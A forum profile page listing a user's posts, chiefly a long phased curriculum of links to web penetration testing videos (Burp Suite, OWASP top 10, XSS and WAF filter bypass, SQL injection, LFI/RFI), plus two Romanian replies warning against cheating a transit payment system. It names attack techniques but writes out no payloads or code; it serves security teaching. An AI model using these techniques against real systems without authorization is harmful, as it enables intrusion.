Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Web Application Penetration Testing Phase 1 – History 1. History of Internet - https://www.youtube.com/watch?v=9hIQjrMHTv4 Phase 2 – Web and Server Technology 2. Basic concepts of web applications, how they work and the HTTP protocol - https://www.youtube.com/watch?v=RsQ1tFLwldY&t=7s 3. HTML basics part 1 - https://www.youtube.com/watch?v=p6fRBGI_BY0 4. HTML basics part 2 - https://www.youtube.com/watch?v=Zs6lzuBVK2w 5. Difference between static and dynamic website - https://www.youtube.com/watch?v=hlg6q6OFoxQ 6. HTTP protocol Understanding - https://www.youtube.com/watch?v=JFZMyhRTVt0 7. Parts of HTTP Request -https://www.youtube.com/watch?v=pHFWGN-upGM 8. Parts of HTTP Response - https://www.youtube.com/watch?v=c9sMNc2PrMU 9. Various HTTP Methods - https://www.youtube.com/watch?v=PO7D20HsFsY 10. Understanding URLS - https://www.youtube.com/watch?v=5Jr-_Za5yQM 11. Intro to REST - https://www.youtube.com/watch?v=YCcAE2SCQ6k 12. HTTP Request & Response Headers - https://www.youtube.com/watch?v=vAuZwirKjWs 13. What is a cookie - https://www.youtube.com/watch?v=I01XMRo2ESg 14. HTTP Status codes - https://www.youtube.com/watch?v=VLH3FMQ5BIQ 15. HTTP Proxy - https://www.youtube.com/watch?v=qU0PVSJCKcs 16. Authentication with HTTP - https://www.youtube.com/watch?v=GxiFXUFKo1M 17. HTTP basic and digest authentication - https://www.youtube.com/watch?v=GOnhCbDhMzk 18. What is “Server-Side” - https://www.youtube.com/watch?v=JnCLmLO9LhA 19. Server and client side with example - https://www.youtube.com/watch?v=DcBB2Fp8WNI 20. What is a session - https://www.youtube.com/watch?v=WV4DJ6b0jhg&t=202s 21. Introduction to UTF-8 and Unicode - https://www.youtube.com/watch?v=sqPTR_v4qFA 22. URL encoding - https://www.youtube.com/watch?v=Z3udiqgW1VA 23. HTML encoding - https://www.youtube.com/watch?v=IiAfCLWpgII&t=109s 24. Base64 encoding - https://www.youtube.com/watch?v=8qkxeZmKmOY 25. Hex encoding & ASCII - https://www.youtube.com/watch?v=WW2SaCMnHdU Phase 3 – Setting up the lab with BurpSuite and bWAPP MANISH AGRAWAL 26. Setup lab with bWAPP - https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 27. Set up Burp Suite - https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2 28. Configure Firefox and add certificate - https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 29. Mapping and scoping website - https://www.youtube.com/watch?v=H-_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 30. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 31. Active and passive scanning - https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 32. Scanner options and demo - https://www.youtube.com/watch?v=gANi4Kt7-ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 33. Introduction to password security - https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8 34. Intruder - https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9 35. Intruder attack types - https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 36. Payload settings - https://www.youtube.com/watch?v=5GpdlbtL-1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 37. Intruder settings - https://www.youtube.com/watch?v=B_Mu7jmOYnU&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=12 ÆTHER SECURITY LAB 38. No.1 Penetration testing tool - https://www.youtube.com/watch?v=AVzC7ETqpDo&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=1 39. Environment Setup - https://www.youtube.com/watch?v=yqnUOdr0eVk&index=2&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA 40. General concept - https://www.youtube.com/watch?v=udl4oqr_ylM&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=3 41. Proxy module - https://www.youtube.com/watch?v=PDTwYFkjQBE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=4 42. Repeater module - https://www.youtube.com/watch?v=9Zh_7s5csCc&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=5 43. Target and spider module - https://www.youtube.com/watch?v=dCKPZUSOlr8&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=6 44. Sequencer and scanner module - https://www.youtube.com/watch?v=G-v581pXerE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=7 Phase 4 – Mapping the application and attack surface 45. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 46. Mapping application using robots.txt - https://www.youtube.com/watch?v=akuzgZ75zrk 47. Discover hidden contents using dirbuster - https://www.youtube.com/watch?v=--nu9Jq07gA 48. Dirbuster in detail - https://www.youtube.com/watch?v=2tOQC68hAcQ 49. Discover hidden directories and files with intruder - https://www.youtube.com/watch?v=4Fz9mJeMNkI 50. Directory bruteforcing 1 - https://www.youtube.com/watch?v=ch2onB_LFoI 51. Directory bruteforcing 2 - https://www.youtube.com/watch?v=ASMW_oLbyIg 52. Identify application entry points - https://www.youtube.com/watch?v=IgJWPZ2OKO8&t=34s 53. Identify application entry points - https://www.owasp.org/index.php/Identify_application_entry_points_(OTG-INFO-006) 54. Identify client and server technology - https://www.youtube.com/watch?v=B8jN_iWjtyM 55. Identify server technology using banner grabbing (telnet) - https://www.youtube.com/watch?v=O67M-U2UOAg 56. Identify server technology using httprecon - https://www.youtube.com/watch?v=xBBHtS-dwsM 57. Pentesting with Google dorks Introduction - https://www.youtube.com/watch?v=NmdrKFwAw9U 58. Fingerprinting web server - https://www.youtube.com/watch?v=tw2VdG0t5kc&list=PLxLRoXCDIalcRS5Nb1I_HM_OzS10E6lqp&index=10 59. Use Nmap for fingerprinting web server - https://www.youtube.com/watch?v=VQV-y_-AN80 60. Review webs servers metafiles for information leakage - https://www.youtube.com/watch?v=sds3Zotf_ZY 61. Enumerate applications on web server - https://www.youtube.com/watch?v=lfhvvTLN60E 62. Identify application entry points - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLDeogY2Qr-tGR2NL2X1AR5Zz9t1iaWwlM 63. Map execution path through application - https://www.youtube.com/watch?v=0I0NPiyo9UI 64. Fingerprint web application frameworks - https://www.youtube.com/watch?v=ASzG0kBoE4c Phase 5 – Understanding and exploiting OWASP top 10 vulnerabilities 65. A closer look at all owasp top 10 vulnerabilities - https://www.youtube.com/watch?v=avFR_Af0KGk IBM 66. Injection - https://www.youtube.com/watch?v=02mLrFVzIYU&index=1&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 67. Broken authentication and session management - https://www.youtube.com/watch?v=iX49fqZ8HGA&index=2&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 68. Cross-site scripting - https://www.youtube.com/watch?v=x6I5fCupLLU&index=3&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 69. Insecure direct object reference - https://www.youtube.com/watch?v=-iCyp9Qz3CI&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=4 70. Security misconfiguration - https://www.youtube.com/watch?v=cIplXL8idyo&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=5 71. Sensitive data exposure - https://www.youtube.com/watch?v=rYlzTQlF8Ws&index=6&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 72. Missing functional level access controls - https://www.youtube.com/watch?v=VMv_gyCNGpk&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=7 73. Cross-site request forgery - https://www.youtube.com/watch?v=_xSFm3KGxh0&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=8 74. Using components with known vulnerabilities - https://www.youtube.com/watch?v=bhJmVBJ-F-4&index=9&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 75. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=L6bYKiLtSL8&index=10&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d F5 CENTRAL 76. Injection - https://www.youtube.com/watch?v=rWHvp7rUka8&index=1&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 77. Broken authentication and session management - https://www.youtube.com/watch?v=mruO75ONWy8&index=2&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 78. Insecure deserialisation - https://www.youtube.com/watch?v=nkTBwbnfesQ&index=8&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 79. Sensitive data exposure - https://www.youtube.com/watch?v=2RKbacrkUBU&index=3&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 80. Broken access control - https://www.youtube.com/watch?v=P38at6Tp8Ms&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=5 81. Insufficient logging and monitoring - https://www.youtube.com/watch?v=IFF3tkUOF5E&index=10&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 82. XML external entities - https://www.youtube.com/watch?v=g2ey7ry8_CQ&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=4 83. Using components with known vulnerabilities - https://www.youtube.com/watch?v=IGsNYVDKRV0&index=9&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 84. Cross-site scripting - https://www.youtube.com/watch?v=IuzU4y-UjLw&index=7&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 85. Security misconfiguration - https://www.youtube.com/watch?v=JuGSUMtKTPU&index=6&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD LUKE BRINER 86. Injection explained - https://www.youtube.com/watch?v=1qMggPJpRXM&index=1&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 87. Broken authentication and session management - https://www.youtube.com/watch?v=fKnG15BL4AY&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=2 88. Cross-site scripting - https://www.youtube.com/watch?v=ksM-xXeDUNs&index=3&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 89. Insecure direct object reference - https://www.youtube.com/watch?v=ZodA76-CB10&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=4 90. Security misconfiguration - https://www.youtube.com/watch?v=DfFPHKPCofY&index=5&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 91. Sensitive data exposure - https://www.youtube.com/watch?v=Z7hafbGDVEE&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=6 92. Missing functional level access control - https://www.youtube.com/watch?v=RGN3w831Elo&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=7 93. Cross-site request forgery - https://www.youtube.com/watch?v=XRW_US5BCxk&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=8 94. Components with known vulnerabilities - https://www.youtube.com/watch?v=pbvDW9pJdng&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=9 95. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=bHTglpgC5Qg&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=10 Phase 6 – Session management testing 96. Bypass authentication using cookie manipulation - https://www.youtube.com/watch?v=mEbmturLljU 97. Cookie Security Via httponly and secure Flag - OWASP - https://www.youtube.com/watch?v=3aKA4RkAg78 98. Penetration testing Cookies basic - https://www.youtube.com/watch?v=_P7KN8T1boc 99. Session fixation 1 - https://www.youtube.com/watch?v=ucmgeHKtxaI 100. Session fixation 2 - https://www.youtube.com/watch?v=0Tu1qxysWOk 101. Session fixation 3 - https://www.youtube.com/watch?v=jxwgpWvRUSo 102. Session fixation 4 - https://www.youtube.com/watch?v=eUbtW0Z0W1g 103. CSRF - Cross site request forgery 1 - https://www.youtube.com/watch?v=m0EHlfTgGUU 104. CSRF - Cross site request forgery 2 - https://www.youtube.com/watch?v=H3iu0_ltcv4 105. CSRF - Cross site request forgery 3 - https://www.youtube.com/watch?v=1NO4I28J-0s 106. CSRF - Cross site request forgery 4 - https://www.youtube.com/watch?v=XdEJEUJ0Fr8 107. CSRF - Cross site request forgery 5 - https://www.youtube.com/watch?v=TwG0Rd0hr18 108. Session puzzling 1 - https://www.youtube.com/watch?v=YEOvmhTb8xA 109. Admin bypass using session hijacking - https://www.youtube.com/watch?v=1wp1o-1TfAc Phase 7 – Bypassing client-side controls 110. What is hidden forms in HTML - https://www.youtube.com/watch?v=orUoGsgaYAE 111. Bypassing hidden form fields using tamper data - https://www.youtube.com/watch?v=NXkGX2sPw7I 112. Bypassing hidden form fields using Burp Suite (Purchase application) - https://www.youtube.com/watch?v=xahvJyUFTfM 113. Changing price on eCommerce website using parameter tampering - https://www.youtube.com/watch?v=A-ccNpP06Zg 114. Understanding cookie in detail - https://www.youtube.com/watch?v=_P7KN8T1boc&list=PLWPirh4EWFpESKWJmrgQwmsnTrL_K93Wi&index=18 115. Cookie tampering with tamper data- https://www.youtube.com/watch?v=NgKXm0lBecc 116. Cookie tamper part 2 - https://www.youtube.com/watch?v=dTCt_I2DWgo 117. Understanding referer header in depth using Cisco product - https://www.youtube.com/watch?v=GkQnBa3C7WI&t=35s 118. Introduction to ASP.NET viewstate - https://www.youtube.com/watch?v=L3p6Uw6SSXs 119. ASP.NET viewstate in depth - https://www.youtube.com/watch?v=Fn_08JLsrmY 120. Analyse sensitive data in ASP.NET viewstate - https://msdn.microsoft.com/en-us/library/ms972427.aspx?f=255&MSPPError=-2147217396 121. Cross-origin-resource-sharing explanation with example - https://www.youtube.com/watch?v=Ka8vG5miErk 122. CORS demo 1 - https://www.youtube.com/watch?v=wR8pjTWaEbs 123. CORS demo 2 - https://www.youtube.com/watch?v=lg31RYYG-T4 124. Security headers - https://www.youtube.com/watch?v=TNlcoYLIGFk 125. Security headers 2 - https://www.youtube.com/watch?v=ZZUvmVkkKu4 Phase 8 – Attacking authentication/login 126. Attacking login panel with bad password - Guess username password for the website and try different combinations 127. Brute-force login panel - https://www.youtube.com/watch?v=25cazx5D_vw 128. Username enumeration - https://www.youtube.com/watch?v=WCO7LnSlskE 129. Username enumeration with bruteforce password attack - https://www.youtube.com/watch?v=zf3-pYJU1c4 130. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=ueSG7TUqoxk 131. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=_WQe36pZ3mA 132. Forgot password vulnerability - case 1 - https://www.youtube.com/watch?v=FEUidWWnZwU 133. Forgot password vulnerability - case 2 - https://www.youtube.com/watch?v=j7-8YyYdWL4 134. Login page autocomplete feature enabled - https://www.youtube.com/watch?v=XNjUfwDmHGc&t=33s 135. Testing for weak password policy - https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) 136. Insecure distribution of credentials - When you register in any website or you request for a password reset using forgot password feature, if the website sends your username and password over the email in cleartext without sending the password reset link, then it is a vulnerability. 137. Test for credentials transportation using SSL/TLS certificate - https://www.youtube.com/watch?v=21_IYz4npRs 138. Basics of MySQL - https://www.youtube.com/watch?v=yPu6qV5byu4 139. Testing browser cache - https://www.youtube.com/watch?v=2T_Xz3Humdc 140. Bypassing login panel -case 1 - https://www.youtube.com/watch?v=TSqXkkOt6oM 141. Bypass login panel - case 2 - https://www.youtube.com/watch?v=J6v_W-LFK1c Phase 9 - Attacking access controls (IDOR, Priv esc, hidden files and directories) Completely unprotected functionalities 142. Finding admin panel - https://www.youtube.com/watch?v=r1k2lgvK3s0 143. Finding admin panel and hidden files and directories - https://www.youtube.com/watch?v=Z0VAPbATy1A 144. Finding hidden webpages with dirbusater - https://www.youtube.com/watch?v=--nu9Jq07gA&t=5s Insecure direct object reference 145. IDOR case 1 - https://www.youtube.com/watch?v=gci4R9Vkulc 146. IDOR case 2 - https://www.youtube.com/watch?v=4DTULwuLFS0 147. IDOR case 3 (zomato) - https://www.youtube.com/watch?v=tCJBLG5Mayo Privilege escalation 148. What is privilege escalation - https://www.youtube.com/watch?v=80RzLSrczmc 149. Privilege escalation - Hackme bank - case 1 - https://www.youtube.com/watch?v=g3lv__87cWM 150. Privilege escalation - case 2 - https://www.youtube.com/watch?v=-i4O_hjc87Y Phase 10 – Attacking Input validations (All injections, XSS and mics) HTTP verb tampering 151. Introduction HTTP verb tampering - https://www.youtube.com/watch?v=Wl0PrIeAnhs 152. HTTP verb tampering demo - https://www.youtube.com/watch?v=bZlkuiUkQzE HTTP parameter pollution 153. Introduction HTTP parameter pollution - https://www.youtube.com/watch?v=Tosp-JyWVS4 154. HTTP parameter pollution demo 1 - https://www.youtube.com/watch?v=QVZBl8yxVX0&t=11s 155. HTTP parameter pollution demo 2 - https://www.youtube.com/watch?v=YRjxdw5BAM0 156. HTTP parameter pollution demo 3 - https://www.youtube.com/watch?v=kIVefiDrWUw XSS - Cross site scripting 157. Introduction to XSS - https://www.youtube.com/watch?v=gkMl1suyj3M 158. What is XSS - https://www.youtube.com/watch?v=cbmBDiR6WaY 159. Reflected XSS demo - https://www.youtube.com/watch?v=r79ozjCL7DA 160. XSS attack method using burpsuite - https://www.youtube.com/watch?v=OLKBZNw3OjQ 161. XSS filter bypass with Xenotix - https://www.youtube.com/watch?v=loZSdedJnqc 162. Reflected XSS filter bypass 1 - https://www.youtube.com/watch?v=m5rlLgGrOVA 163. Reflected XSS filter bypass 2 - https://www.youtube.com/watch?v=LDiXveqQ0gg 164. Reflected XSS filter bypass 3 - https://www.youtube.com/watch?v=hb_qENFUdOk 165. Reflected XSS filter bypass 4 - https://www.youtube.com/watch?v=Fg1qqkedGUk 166. Reflected XSS filter bypass 5 - https://www.youtube.com/watch?v=NImym71f3Bc 167. Reflected XSS filter bypass 6 - https://www.youtube.com/watch?v=9eGzAym2a5Q 168. Reflected XSS filter bypass 7 - https://www.youtube.com/watch?v=ObfEI84_MtM 169. Reflected XSS filter bypass 8 - https://www.youtube.com/watch?v=2c9xMe3VZ9Q 170. Reflected XSS filter bypass 9 - https://www.youtube.com/watch?v=-48zknvo7LM 171. Introduction to Stored XSS - https://www.youtube.com/watch?v=SHmQ3sQFeLE 172. Stored XSS 1 - https://www.youtube.com/watch?v=oHIl_pCahsQ 173. Stored XSS 2 - https://www.youtube.com/watch?v=dBTuWzX8hd0 174. Stored XSS 3 - https://www.youtube.com/watch?v=PFG0lkMeYDc 175. Stored XSS 4 - https://www.youtube.com/watch?v=YPUBFklUWLc 176. Stored XSS 5 - https://www.youtube.com/watch?v=x9Zx44EV-Og SQL injection 177. Part 1 - Install SQLi lab - https://www.youtube.com/watch?v=NJ9AA1_t1Ic&index=23&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 178. Part 2 - SQL lab series - https://www.youtube.com/watch?v=TA2h_kUqfhU&index=22&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 179. Part 3 - SQL lab series - https://www.youtube.com/watch?v=N0zAChmZIZU&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=21 180. Part 4 - SQL lab series - https://www.youtube.com/watch?v=6pVxm5mWBVU&index=20&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 181. Part 5 - SQL lab series - https://www.youtube.com/watch?v=0tyerVP9R98&index=19&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 182. Part 6 - Double query injection - https://www.youtube.com/watch?v=zaRlcPbfX4M&index=18&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 183. Part 7 - Double query injection cont.. - https://www.youtube.com/watch?v=9utdAPxmvaI&index=17&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 184. Part 8 - Blind injection boolean based - https://www.youtube.com/watch?v=u7Z7AIR6cMI&index=16&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 185. Part 9 - Blind injection time based - https://www.youtube.com/watch?v=gzU1YBu_838&index=15&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 186. Part 10 - Dumping DB using outfile - https://www.youtube.com/watch?v=ADW844OA6io&index=14&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 187. Part 11 - Post parameter injection error based - https://www.youtube.com/watch?v=6sQ23tqiTXY&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=13 188. Part 12 - POST parameter injection double query based - https://www.youtube.com/watch?v=tjFXWQY4LuA&index=12&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 189. Part 13 - POST parameter injection blind boolean and time based - https://www.youtube.com/watch?v=411G-4nH5jE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=10 190. Part 14 - Post parameter injection in UPDATE query - https://www.youtube.com/watch?v=2FgLcPuU7Vw&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=11 191. Part 15 - Injection in insert query - https://www.youtube.com/watch?v=ZJiPsWxXYZs&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=9 192. Part 16 - Cookie based injection - https://www.youtube.com/watch?v=-A3vVqfP8pA&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=8 193. Part 17 - Second order injection -https://www.youtube.com/watch?v=e9pbC5BxiAE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=7 194. Part 18 - Bypassing blacklist filters - 1 - https://www.youtube.com/watch?v=5P-knuYoDdw&index=6&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 195. Part 19 - Bypassing blacklist filters - 2 - https://www.youtube.com/watch?v=45BjuQFt55Y&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=5 196. Part 20 - Bypassing blacklist filters - 3 - https://www.youtube.com/watch?v=c-Pjb_zLpH0&index=4&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 197. Part 21 - Bypassing WAF - https://www.youtube.com/watch?v=uRDuCXFpHXc&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=2 198. Part 22 - Bypassing WAF - Impedance mismatch - https://www.youtube.com/watch?v=ygVUebdv_Ws&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=3 199. Part 23 - Bypassing addslashes - charset mismatch - https://www.youtube.com/watch?v=du-jkS6-sbo&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=1 NoSQL injection 200. Introduction to NoSQL injection - https://www.youtube.com/watch?v=h0h37-Dwd_A 201. Introduction to SQL vs NoSQL - Difference between MySQL and MongoDB with tutorial - https://www.youtube.com/watch?v=QwevGzVu_zk 202. Abusing NoSQL databases - https://www.youtube.com/watch?v=lcO1BTNh8r8 203. Making cry - attacking NoSQL for pentesters - https://www.youtube.com/watch?v=NgsesuLpyOg Xpath and XML injection 204. Introduction to Xpath injection - https://www.youtube.com/watch?v=2_UyM6Ea0Yk&t=3102s 205. Introduction to XML injection - https://www.youtube.com/watch?v=9ZokuRHo-eY 206. Practical 1 - bWAPP - https://www.youtube.com/watch?v=6tV8EuaHI9M 207. Practical 2 - Mutillidae - https://www.youtube.com/watch?v=fV0qsqcScI4 208. Practical 3 - webgoat - https://www.youtube.com/watch?v=5ZDSPVp1TpM 209. Hack admin panel using Xpath injection - https://www.youtube.com/watch?v=vvlyYlXuVxI 210. XXE demo - https://www.youtube.com/watch?v=3B8QhyrEXlU 211. XXE demo 2 - https://www.youtube.com/watch?v=UQjxvEwyUUw 212. XXE demo 3 - https://www.youtube.com/watch?v=JI0daBHq6fA LDAP injection 213. Introduction and practical 1 - https://www.youtube.com/watch?v=-TXFlg7S9ks 214. Practical 2 - https://www.youtube.com/watch?v=wtahzm_R8e4 OS command injection 215. OS command injection in bWAPP - https://www.youtube.com/watch?v=qLIkGJrMY9k 216. bWAAP- OS command injection with Commiux (All levels) - https://www.youtube.com/watch?v=5-1QLbVa8YE Local file inclusion 217. Detailed introduction - https://www.youtube.com/watch?v=kcojXEwolIs 218. LFI demo 1 - https://www.youtube.com/watch?v=54hSHpVoz7A 219. LFI demo 2 - https://www.youtube.com/watch?v=qPq9hIVtitI Remote file inclusion 220. Detailed introduction - https://www.youtube.com/watch?v=MZjORTEwpaw 221. RFI demo 1 - https://www.youtube.com/watch?v=gWt9A6eOkq0 222. RFI introduction and demo 2 - https://www.youtube.com/watch?v=htTEfokaKsM HTTP splitting/smuggling 223. Detailed introduction - https://www.youtube.com/watch?v=bVaZWHrfiPw 224. Demo 1 - https://www.youtube.com/watch?v=mOf4H1aLiiE Phase 11 – Generating and testing error codes 225. Generating normal error codes by visiting files that may not exist on the server - for example visit chintan.php or chintan.aspx file on any website and it may redirect you to 404.php or 404.aspx or their customer error page. Check if an error page is generated by default web server or application framework or a custom page is displayed which does not display any sensitive information. 226. Use BurpSuite fuzzing techniques to generate stack trace error codes - https://www.youtube.com/watch?v=LDF6OkcvBzM Phase 12 – Weak cryptography testing 227. SSL/TLS weak configuration explained - https://www.youtube.com/watch?v=Rp3iZUvXWlM 228. Testing weak SSL/TLS ciphers - https://www.youtube.com/watch?v=slbwCMHqCkc 229. Test SSL/TLS security with Qualys guard - https://www.youtube.com/watch?v=Na8KxqmETnw 230. Sensitive information sent via unencrypted channels - https://www.youtube.com/watch?v=21_IYz4npRs Phase 12 – Business logic vulnerability 231. What is a business logic flaw - https://www.youtube.com/watch?v=ICbvQzva6lE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI 232. The Difficulties Finding Business Logic Vulnerabilities with Traditional Security Tools - https://www.youtube.com/watch?v=JTMg0bhkUbo&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=2 233. How To Identify Business Logic Flaws - https://www.youtube.com/watch?v=FJcgfLM4SAY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=3 234. Business Logic Flaws: Attacker Mindset - https://www.youtube.com/watch?v=Svxh9KSTL3Y&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=4 235. Business Logic Flaws: Dos Attack On Resource - https://www.youtube.com/watch?v=4S6HWzhmXQk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=5 236. Business Logic Flaws: Abuse Cases: Information Disclosure - https://www.youtube.com/watch?v=HrHdUEUwMHk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=6 237. Business Logic Flaws: Abuse Cases: iPod Repairman Dupes Apple - https://www.youtube.com/watch?v=8yB_ApVsdhA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=7 238. Business Logic Flaws: Abuse Cases: Online Auction - https://www.youtube.com/watch?v=oa_UICCqfbY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=8 239. Business Logic Flaws: How To Navigate Code Using ShiftLeft Ocular - https://www.youtube.com/watch?v=hz7IZu6H6oE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=9 240. Business Logic Security Checks: Data Privacy Compliance - https://www.youtube.com/watch?v=qX2fyniKUIQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=10 241. Business Logic Security Checks: Encryption Compliance - https://www.youtube.com/watch?v=V8zphJbltDY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=11 242. Business Logic Security: Enforcement Checks - https://www.youtube.com/watch?v=5e7qgY_L3UQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=12 243. Business Logic Exploits: SQL Injection - https://www.youtube.com/watch?v=hcIysfhA9AA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=13 244. Business Logic Exploits: Security Misconfiguration - https://www.youtube.com/watch?v=ppLBtCQcYRk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=15 245. Business Logic Exploits: Data Leakage - https://www.youtube.com/watch?v=qe0bEvguvbs&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=16 246. Demo 1 - https://www.youtube.com/watch?v=yV7O-QRyOao 247. Demo 2 - https://www.youtube.com/watch?v=mzjTG7pKmQI 248. Demo 3 - https://www.youtube.com/watch?v=A8V_58QZPMs 249. Demo 4 - https://www.youtube.com/watch?v=1pvrEKAFJyk 250. Demo 5 - https://hackerone.com/reports/145745 251. Demo 6 - https://hackerone.com/reports/430854 Sursa: https://drive.google.com/file/d/11TajgAcem-XI5H8Pu8Aa2GiUofyM0oQm/view
  2. Nu poti sa ii arati acele poze si gata? Totusi, orice ai face, probabil daca se prinde si anunta controlorii/politia e nasol ma gandesc.
  3. Salut, nu cred ca am inteles exact ce vrei sa faci de fapt. Din punctul meu de vedere, daca incerci sa pacalesti acel sistem de plati e foarte probabil sa ai probleme mai mari decat 240$ pe luna. Sunt destul de sigur ca exista un mecanism de validare a calatoriilor care poate fi dificil de pacalit. Chiar si la noi in RO e dificil de pacalit RATB/STB.
